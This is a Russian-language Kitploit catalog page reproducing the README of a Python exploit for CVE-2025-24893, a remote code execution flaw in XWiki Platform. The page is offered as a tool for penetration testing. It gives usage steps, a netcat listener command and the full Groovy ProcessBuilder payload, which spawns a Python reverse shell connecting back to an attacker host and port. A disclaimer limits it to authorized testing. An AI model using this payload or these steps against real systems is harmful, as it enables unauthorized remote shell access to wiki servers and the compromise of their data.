Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-24893 — Python3-эксплойт для CVE-2025-24893 — уязвимости удалённого выполнения кода в XWiki Platform. Автоматически определяет HTTPS/HTTP, формирует полезную нагрузку в виде асинхронного Groovy-макроса и доставляет настраиваемый reverse shell для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/hackersonsteroids/cve-2025-24893
ЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Репозиторий
521 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Python3-эксплойт для CVE-2025-24893 — уязвимости удалённого выполнения кода в XWiki Platform. Автоматически определяет HTTPS/HTTP, формирует полезную нагрузку в виде асинхронного Groovy-макроса и доставляет настраиваемый reverse shell для авторизованного тестирования безопасности.

Поделиться

CVE-2025-24893 XWiki RCE Exploit

Exploit Banner

Простой скрипт на Python3 для эксплуатации CVE-2025-24893 — уязвимости удалённого выполнения кода в XWiki Platform, использующей асинхронный макрос на основе Groovy и настраиваемый payload для обратной оболочки.

⚠️ ВНИМАНИЕ: Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно и неэтично.


Содержание

  • Возможности
  • Требования
  • Установка
  • Использование
  • Определение протокола и запасной вариант
  • Payload обратной оболочки
  • Лицензия
  • Отказ от ответственности

Возможности

  • ✅ Автоматически определяет, поддерживает ли цель HTTPS или HTTP
  • ✅ Формирует Groovy-фрагмент ProcessBuilder для обхода особенностей Runtime.exec
  • ✅ URL-кодирует payload XWiki async+groovy макроса
  • ✅ Настраиваемая обратная оболочка (хост + порт)
  • ✅ Выводит код HTTP-ответа для проверки доставки

  • Требования

    • Python 3.6 или выше
    • Библиотека requests
    root@kitploit:~
    pip install requests
    

    Установка

    Клонируйте этот репозиторий:

    root@kitploit:~
    git clone https://github.com/hackersonsteroids/cve-2025-24893.git
    cd cve-2025-24893
    

    Использование

    root@kitploit:~
    ./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
    
    • <TARGET_DOMAIN> Хост XWiki (например, wiki.example.local).

    • <LHOST> IP вашей атакующей машины (где запущен ваш слушатель).

    • <LPORT> Порт вашего слушателя (целое число).


    Пример

    1. Запустите слушатель на вашей машине:
    root@kitploit:~
    nc -lvnp 4444
    
    1. Запустите эксплойт:
    root@kitploit:~
    ./exploit.py wiki.vulnerable.local 10.0.0.5 4444
    
    1. В случае успеха проверьте ваш netcat-слушатель на наличие оболочки.

    Определение протокола и запасной вариант

    Перед отправкой payload скрипт:

    1. Пробует https://<TARGET_DOMAIN>
    2. Если HTTPS не работает, переключается на http://<TARGET_DOMAIN>
    3. Завершает работу, если ни один из протоколов недоступен

    Это помогает обеспечить совместимость с развёртываниями, использующими смешанные протоколы.


    Payload обратной оболочки

    По умолчанию скрипт использует однострочник на Python3:

    root@kitploit:~
    new ProcessBuilder(
      ['/bin/bash','-c',
       'python3 -c \'import socket,subprocess,os;'
       's=socket.socket();s.connect(("LHOST",LPORT));'
       'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
       'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
    ).redirectErrorStream(true).start()
    
    • Вы можете изменить функцию build_payload(), если вам нужна другая оболочка (например, Bash, Perl, PHP и т. д.).

    Лицензия

    Этот проект лицензирован в соответствии с лицензией MIT. Подробности см. в файле LICENSE.


    Отказ от ответственности

    Этот инструмент предназначен только для авторизованной оценки безопасности и образовательных целей. Авторы не несут ответственности за неправомерное использование. Всегда получайте явное разрешение перед тестированием любых целевых систем.

    Скачать инструмент